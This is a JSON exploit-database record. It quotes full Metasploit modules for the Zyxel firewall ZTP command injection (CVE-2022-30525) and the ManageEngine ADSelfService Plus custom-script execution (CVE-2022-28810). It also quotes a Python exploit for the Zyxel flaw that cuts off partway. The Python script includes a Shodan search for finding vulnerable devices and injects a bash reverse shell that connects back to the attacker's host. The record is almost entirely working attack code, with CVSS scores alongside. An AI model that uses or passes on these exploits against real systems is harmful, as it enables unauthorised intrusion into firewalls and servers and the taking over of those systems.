"https://packetstormsecurity.com/files/167182/Zyxel-Firewall-ZTP-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits CVE-2022-30525, an unauthenticated remote \ncommand injection vulnerability affecting Zyxel firewalls with zero \ntouch provisioning (ZTP) support. By sending a malicious setWanPortSt \ncommand containing an mtu field with a crafted OS command to the \n/ztp/cgi-bin/handler page, an attacker can gain remote command execution \nas the nobody user. \n \nAffected Zyxel models are: \n \n* USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below \n* USG20-VPN and USG20W-VPN using firmware 5.21 and below \n* ATP 100, 200, 500, 700, 800 using firmware 5.21 and below \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'jbaines-r7' # Vulnerability discovery and Metasploit module \n], \n'References' => [ \n[ 'CVE', '2022-30525' ], \n[ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/'] \n], \n'DisclosureDate' => '2022-04-28', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_MIPS64,], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Shell Dropper', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_MIPS64], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'curl', 'wget' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \n# Checks the build date that is embedded in the landing page. If it finds a build \n# date older than April 20, 2022 then it will additionally check if the model is \n# a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this \n# seems like a reasonable approach. \ndef check \nres = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/')) \nunless res \nreturn CheckCode::Unknown('The target failed to respond to check.') \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe('Failed to retrieve /') \nend \n \nver = res.body[/favicon\\.ico\\?v=(?<build_date>[0-9]{6,})/, :build_date] \nif ver.nil? \nreturn CheckCode::Safe('Could not extract a version number') \nend \n \nif ver[0..5].to_i < 220420 \nmodel = res.get_html_document.xpath('//title').text \nif model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN')) \nreturn CheckCode::Appears(\"This was determined by the model and build date: #{model}, #{ver}\") \nend \nend \n \nCheckCode::Safe(\"This determination is based on the build date string: #{ver}.\") \nend \n \ndef execute_command(cmd, _opts = {}) \nhandler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler') \nprint_status(\"Sending command to #{handler_uri}\") \n \n# this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too \n# but it's more involved. \nhttp_payload = { \n'command' => 'setWanPortSt', \n'proto' => 'dhcp', \n'port' => Rex::Text.rand_text_numeric(4).to_s, \n'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s, \n'vlanid' => Rex::Text.rand_text_numeric(4).to_s, \n'mtu' => \";#{cmd};\", \n'data' => '' \n} \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => handler_uri, \n'headers' => \n{ \n'Content-Type' => 'application/json; charset=utf-8' \n}, \n'data' => http_payload.to_json \n}) \n# Successful exploitation can result in no response (connection being held open by a reverse shell) \n# or, if the command executes immediately, a response with a 503. \nif res && res.code != 503 \nfail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\") \nend \nprint_good('Command successfully executed.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167182/zyxel_ztp_rce.rb.txt"}], "zdt": [{"lastseen": "2022-04-26T21:33:07", "description": "This Metasploit module exploits the \"custom script\" feature of ADSelfService Plus. The feature was removed in build 6122 as part of the patch for CVE-2022-28810. For purposes of this module, a \"custom script\" is arbitrary operating system command execution. This module uses an attacker provided \"admin\" account to insert the malicious payload into the custom script fields. When a user resets their password or unlocks their account, the payload in the custom script will be executed. The payload will be executed as SYSTEM if ADSelfService Plus is installed as a service, which we believe is the normal operational behavior. This is a passive module because user interaction is required to trigger the payload. This module also does not automatically remove the malicious code from the remote target. Use the \"TARGET_RESET\" operation to remove the malicious custom script when you are done.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-21T00:00:00", "type": "zdt", "title": "ManageEngine ADSelfService Plus Custom Script Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28810"], "modified": "2022-04-21T00:00:00", "id": "1337DAY-ID-37661", "href": "https://0day.today/exploit/description/37661", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution',\n 'Description' => %q{\n This module exploits the \"custom script\" feature of ADSelfService Plus. The\n feature was removed in build 6122 as part of the patch for CVE-2022-28810.\n For purposes of this module, a \"custom script\" is arbitrary operating system\n command execution.\n\n This module uses an attacker provided \"admin\" account to insert the malicious\n payload into the custom script fields. When a user resets their password or\n unlocks their account, the payload in the custom script will be executed.\n The payload will be executed as SYSTEM if ADSelfService Plus is installed as\n a service, which we believe is the normal operational behavior.\n\n This is a passive module because user interaction is required to trigger the\n payload. This module also does not automatically remove the malicious code from\n the remote target. Use the \"TARGET_RESET\" operation to remove the malicious\n custom script when you are done.\n\n ADSelfService Plus uses default credentials of \"admin\":\"admin\"\n },\n 'Author' => [\n # Discovered and exploited by unknown threat actors\n 'Jake Baines', # Analysis, CVE credit, and Metasploit module\n 'Hernan Diaz', # Analysis and CVE credit\n 'Andrew Iwamaye', # Analysis and CVE credit\n 'Dan Kelley' # Analysis and CVE credit\n ],\n 'References' => [\n ['CVE', '2022-28810'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/']\n ],\n 'DisclosureDate' => '2022-04-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true, # false if ADSelfService Plus is not run as a service\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888,\n 'DisablePayloadHandler' => true,\n 'JJS_PATH' => '..\\\\jre\\\\bin\\\\jjs.exe'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']),\n OptString.new('USERNAME', [true, 'The administrator username', 'admin']),\n OptString.new('PASSWORD', [true, 'The administrator user\\'s password', 'admin']),\n OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false])\n ])\n end\n\n ##\n # Because this is an authenticated vulnerability, we will rely on a version string\n # for the check function. We can extract the version (or build) from selfservice/index.html.\n ##\n def check\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html'))\n unless res\n return CheckCode::Unknown('The target failed to respond to check.')\n end\n\n unless res.code == 200\n return CheckCode::Safe('Failed to retrieve /selfservice/index.html')\n end\n\n ver = res.body[/\\.css\\?buildNo=(?<build_id>[0-9]+)/, :build_id]\n if ver.nil?\n return CheckCode::Safe('Could not extract a version number')\n end\n\n if Rex::Version.new(ver) < Rex::Version.new('6122')\n return CheckCode::Appears(\"This determination is based on the version string: #{ver}.\")\n end\n\n CheckCode::Safe(\"This determination is based on the version string: #{ver}.\")\n end\n\n ##\n # Authenticate with the remote target. Login requires four steps:\n #\n # 1. Grab a CSRF token\n # 2. Post credentials to /ServletAPI/accounts/login\n # 3. Post credentials to /j_security_check\n # 4. Grab another CSRF token for authenticated requests\n #\n # @return a new CSRF token to use with authenticated requests\n ##\n def authenticate\n # grab a CSRF token from the index\n res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') })\n fail_with(Failure::Unreachable, 'The target did not respond') unless res\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty?\n csrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token]\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok\n\n # send the first login request to get the ssp token\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'loginName' => datastore['USERNAME'],\n 'domainName' => 'ADSelfService Plus Authentication',\n 'j_username' => datastore['USERNAME'],\n 'j_password' => datastore['PASSWORD'],\n 'AUTHRULE_NAME' => 'ADAuthenticator',\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200\n\n # send the second login request to get the sso token\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/j_security_check'),\n 'keep_cookies' => true,\n 'vars_post' =>\n {\n 'loginName' => datastore['USERNAME'],\n 'domainName' => 'ADSelfService Plus Authentication',\n 'j_username' => datastore['USERNAME'],\n 'j_password' => datastore['PASSWORD'],\n 'AUTHRULE_NAME' => 'ADAuthenticator',\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302\n\n # revisit authorization.do to complete authentication\n res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 'keep_cookies' => true })\n fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty?\n csrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token]\n fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok\n\n print_good('Authentication successful')\n csrf_tok\n end\n\n ##\n # Triggering the payload requires user interaction. Using the default payload\n # handler will cause this module to exit after planting the payload, so the\n # module will spawn it's own handler so that it doesn't exit until a shell\n # has been received/handled. Note that this module is passive so it should\n # just be chilling quietly in the background.\n #\n # This code is largely copy/paste from windows/local/persistence.rb\n ##\n def create_multihandler(lhost, lport, payload_name)\n pay = framework.payloads.create(payload_name)\n pay.datastore['LHOST'] = lhost\n pay.datastore['LPORT'] = lport\n print_status('Starting exploit/multi/handler')\n\n # Set options for module\n mh = framework.exploits.create('multi/handler')\n mh.share_datastore(pay.datastore)\n mh.datastore['PAYLOAD'] = payload_name\n mh.datastore['EXITFUNC'] = 'thread'\n mh.datastore['ExitOnSession'] = true\n # Validate module options\n mh.options.validate(mh.datastore)\n # Execute showing output\n mh.exploit_simple(\n 'Payload' => mh.datastore['PAYLOAD'],\n 'LocalInput' => user_input,\n 'LocalOutput' => user_output,\n 'RunAsJob' => true\n )\n\n # Check to make sure that the handler is actually valid\n # If another process has the port open, then the handler will fail\n # but it takes a few seconds to do so. The module needs to give\n # the handler time to fail or the resulting connections from the\n # target could end up on on a different handler with the wrong payload\n # or dropped entirely.\n Rex.sleep(5)\n return nil if framework.jobs[mh.job_id.to_s].nil?\n\n return mh.job_id.to_s\n end\n\n # The json policy blob that ADSSP provides us is not accepted by ADSSP\n # if we try to POST it back. Specifically, ADSP is very unhappy about all\n # the booleans using \"true\" or \"false\" instead of \"1\" or \"0\" *except* for\n # HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but\n # here we are.\n def fix_adssp_json(json_hash)\n json_hash.map do |key, value|\n if value.is_a? Hash\n [key, fix_adssp_json(value)]\n elsif value.is_a? Array\n value = value.map do |array_val|\n if array_val.is_a? Hash\n array_val = fix_adssp_json(array_val)\n end\n array_val\n end\n [key, value]\n elsif key == 'HIDE_CAPTCHA_RPUA'\n [key, value]\n elsif value.is_a? TrueClass\n [key, 1]\n elsif value.is_a? FalseClass\n [key, 0]\n else\n [key, value]\n end\n end.to_h\n end\n\n def exploit\n csrf_tok = authenticate\n\n # Grab the list of configured policies\n policy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails')\n print_status(\"Requesting policy list from #{policy_list_uri}\")\n res = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri })\n fail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200\n policy_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if policy_json.nil?\n policy_details_json = policy_json['POLICY_DETAILS']\n fail_with(Failure::UnexpectedReply, \"The target didn't have any configured policies\") if policy_details_json.nil?\n\n # There can be multiple policies. This logic will loop over each one, grab the configuration\n # details, update the configuration to include our payload, and then POST it back.\n policy_details_json.each do |policy_entry|\n policy_id = policy_entry['POLICY_ID']\n policy_name = policy_entry['POLICY_NAME']\n fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil?\n\n print_status(\"Requesting policy details for #{policy_name}\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'),\n 'vars_get' =>\n {\n 'POLICY_ID' => policy_id\n }\n })\n fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200\n\n # load the JSON and insert (or remove) our payload\n specific_policy_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if specific_policy_json.nil?\n fail_with(Failure::UnexpectedReply, \"The target didn't contain the expected JSON\") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil?\n new_payload = \"cmd.exe /c #{payload.encoded}\"\n\n if datastore['TARGET_RESET']\n print_status('Disabling custom script functionality')\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0'\n specific_policy_json['SCRIPT_COMMAND_RESET'] = ''\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0'\n specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = ''\n else\n print_status('Enabling custom scripts and inserting the payload')\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1'\n specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload\n specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1'\n specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload\n end\n\n # fix up the ADSSP provided json so ADSSP will accept it o.O\n updated_policy = fix_adssp_json(specific_policy_json).to_json\n\n policy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails')\n print_status(\"Posting updated policy configuration to #{policy_update_uri}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => policy_update_uri,\n 'vars_post' =>\n {\n 'APC_SETTINGS_DETAILS' => updated_policy,\n 'POLICY_NAME' => policy_name,\n 'adscsrf' => csrf_tok\n }\n })\n fail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200\n\n # spawn our own payload handler?\n if !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler']\n listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])\n if listener_job_id.blank?\n print_error(\"Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.\")\n end\n else\n print_good('Done!')\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37661", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T21:37:30", "description": "This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T00:00:00", "type": "zdt", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T00:00:00", "id": "1337DAY-ID-37733", "href": "https://0day.today/exploit/description/37733", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits CVE-2022-30525, an unauthenticated remote\n command injection vulnerability affecting Zyxel firewalls with zero\n touch provisioning (ZTP) support. By sending a malicious setWanPortSt\n command containing an mtu field with a crafted OS command to the\n /ztp/cgi-bin/handler page, an attacker can gain remote command execution\n as the nobody user.\n\n Affected Zyxel models are:\n\n * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below\n * USG20-VPN and USG20W-VPN using firmware 5.21 and below\n * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2022-30525' ],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']\n ],\n 'DisclosureDate' => '2022-04-28',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_MIPS64,],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Shell Dropper',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_MIPS64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'curl', 'wget' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Checks the build date that is embedded in the landing page. If it finds a build\n # date older than April 20, 2022 then it will additionally check if the model is\n # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this\n # seems like a reasonable approach.\n def check\n res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))\n unless res\n return CheckCode::Unknown('The target failed to respond to check.')\n end\n\n unless res.code == 200\n return CheckCode::Safe('Failed to retrieve /')\n end\n\n ver = res.body[/favicon\\.ico\\?v=(?<build_date>[0-9]{6,})/, :build_date]\n if ver.nil?\n return CheckCode::Safe('Could not extract a version number')\n end\n\n if ver[0..5].to_i < 220420\n model = res.get_html_document.xpath('//title').text\n if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))\n return CheckCode::Appears(\"This was determined by the model and build date: #{model}, #{ver}\")\n end\n end\n\n CheckCode::Safe(\"This determination is based on the build date string: #{ver}.\")\n end\n\n def execute_command(cmd, _opts = {})\n handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')\n print_status(\"Sending command to #{handler_uri}\")\n\n # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too\n # but it's more involved.\n http_payload = {\n 'command' => 'setWanPortSt',\n 'proto' => 'dhcp',\n 'port' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,\n 'vlanid' => Rex::Text.rand_text_numeric(4).to_s,\n 'mtu' => \";#{cmd};\",\n 'data' => ''\n }\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => handler_uri,\n 'headers' =>\n {\n 'Content-Type' => 'application/json; charset=utf-8'\n },\n 'data' => http_payload.to_json\n })\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 503.\n if res && res.code != 503\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n print_good('Command successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37733", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-03T08:16:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "zdt", "title": "Zyxel USG FLEX 5.21 - OS Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-03T00:00:00", "id": "1337DAY-ID-37766", "href": "https://0day.today/exploit/description/37766", "sourceData": "# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection\n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\"\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://www.zyxel.com\n# Version: ZLD5.00 thru ZLD5.21\n# Tested on: Linux\n# CVE: CVE-2022-30525\n\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nimport sys\nimport json\nimport base64\nimport requests\nimport argparse\n\n\nparser = argparse.ArgumentParser(\n prog=\"CVE-2022-30525.py\",\n description=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\",\n)\nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\")\nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\")\nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\")\n\nargs = parser.parse_args()\n\nbanner = (\n \"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\"\n \"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\"\n \"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\"\n \"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\"\n \"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\"\n \"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\"\n \"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\"\n \"biA6KSApCg==\"\n)\n\n\ndef main():\n\n print(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\"))\n\n if None in vars(args).values():\n print(f\"[!] Please enter all parameters !\")\n parser.print_help()\n sys.exit()\n\n if \"http\" not in args.url:\n args.url = \"https://\" + args.url\n args.url += \"/ztp/cgi-bin/handler\"\n exploit(args.url, args.host, args.port)\n\n\ndef exploit(url, host, port):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\",\n \"Content-Type\": \"application/json\",\n }\n\n data = {\n \"command\": \"setWanPortSt\",\n \"proto\": \"dhcp\",\n \"port\": \"4\",\n \"vlan_tagged\": \"1\",\n \"vlanid\": \"5\",\n \"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";',\n \"data\": \"hi\",\n }\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n print(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\")\n\n try:\n response = requests.post(\n 